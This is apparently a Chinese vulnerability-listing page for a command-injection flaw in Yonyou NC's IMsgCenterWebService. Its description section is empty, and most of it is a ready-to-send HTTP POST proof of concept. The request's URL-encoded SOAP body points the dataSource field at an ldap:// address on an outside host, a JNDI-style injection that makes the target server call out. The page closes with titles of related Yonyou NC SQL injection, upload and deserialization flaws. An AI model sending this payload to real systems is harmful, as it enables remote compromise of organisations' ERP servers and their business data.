用友NC IMsgCenterWebService命令注入漏洞

漏洞描述

PoC代码

POST /uapws/soapRequest.ajax HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 625
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

ws=nc.itf.msgcenter.IMsgCenterWebService&soap=%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3cenv%3aEnvelope%20xmlns%3aenv%3d%22http%3a%2f%2fschemas.xmlsoap.org%2fsoap%2fenvelope%2f%22%20xmlns%3asn%3d%22http%3a%2f%2fmsgcenter.itf.nc%2fIMsgCenterWebService%22%3e%3cenv%3aHeader%2f%3e%3cenv%3aBody%3e%3csn%3auploadAttachment%3e%3cdataSource%3eldap%3a%2f%2fvanecomyhj.iyhc.eu.org%2fTest%3c%2fdataSource%3e%3cmsgtype%3e%3f%3c%2fmsgtype%3e%3cpk_sourcemsg%3e%3f%3c%2fpk_sourcemsg%3e%3cfilename%3e%3f%3c%2ffilename%3e%3cfile%3e%3f%3c%2ffile%3e%3c%2fsn%3auploadAttachment%3e%3c%2fenv%3aBody%3e%3c%2fenv%3aEnvelope%3e

相关漏洞推荐

• 用友NC /portal/pt/oacoSchedulerEvents/uncancelEvent SQL 注入漏洞
• 用友NC /ebvp/register/qrySubPurchaseOrgByParentPk SQL 注入漏洞
• 用友 NC Cloud /ncchr/pm/obj/queryPsnInfo SQL 注入漏洞
• 用友NC /portal/pt/infopathimport/importExcelTemplate pageId 文件上传漏洞
• 用友NC OAUserQryServlet 反序列化漏洞
• 用友NC OAUserAuthenticationServlet 反序列化漏洞
• 用友NC ContactsQueryServiceServlet 反序列化漏洞
• POC 用友NC UserSynchronizationServlet 反序列化漏洞
• 用友NC ContactsFuzzySearchServlet 反序列化漏洞
• POC 用友NC IMsgCenterWebService 命令执行漏洞
• POC 用友nc soapRequest.ajax 命令执行漏洞
• 用友NC存在 PaWfm2/open SQL注入漏洞
• 用友NC系统workflowService接口SQL注入漏洞